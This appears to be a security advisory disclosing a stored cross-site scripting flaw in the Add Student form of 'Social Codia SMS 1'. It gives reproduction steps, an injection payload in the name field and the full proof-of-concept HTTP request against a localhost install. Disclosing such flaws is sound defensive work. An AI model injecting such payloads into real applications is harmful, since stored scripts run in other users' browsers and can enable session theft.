Social Codia SMS 1 Cross Site Scripting

2022.04.08
Credit: D4rkP0w4r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# sms-Add_Student-Stored_XSS-POC # Author: D4rkP0w4r Description => Stored_XSS at Add Student # Step to Reproduct * Login to admin -> Students -> Add Student -> input payload <img/src/onerror=prompt(10)> at Enter Name # Exploit * Input payload at Enter Name -> clicked Add Students -> access All Student -> The XSS will trigger * Log out admin and typed roll number -> The XSS will trigger # Vulnerable Code * When inserting into the database, the input is not filtered out bad characters # POC * Injection Point ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="name" <img/src/onerror=prompt(10)> * Request POST /sms/admin/addstudent.php HTTP/1.1 Host: localhost:8080 Content-Length: 992 Cache-Control: max-age=0 sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost:8080 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAvKt9LM2RnnkuA0K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:8080/sms/admin/addstudent.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=p440fhd7svqid5f063i3epg29k Connection: close ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="image"; filename="car.png" Content-Type: application/octet-stream ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="rollno" 1234567 ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="name" <img/src/onerror=prompt(10)> ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="contact" 123456 ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="standerd" 1 ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="city" Newyork ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="email" haha@gmail.com ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="gender" male ------WebKitFormBoundaryAvKt9LM2RnnkuA0K Content-Disposition: form-data; name="submit" ------WebKitFormBoundaryAvKt9LM2RnnkuA0K--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top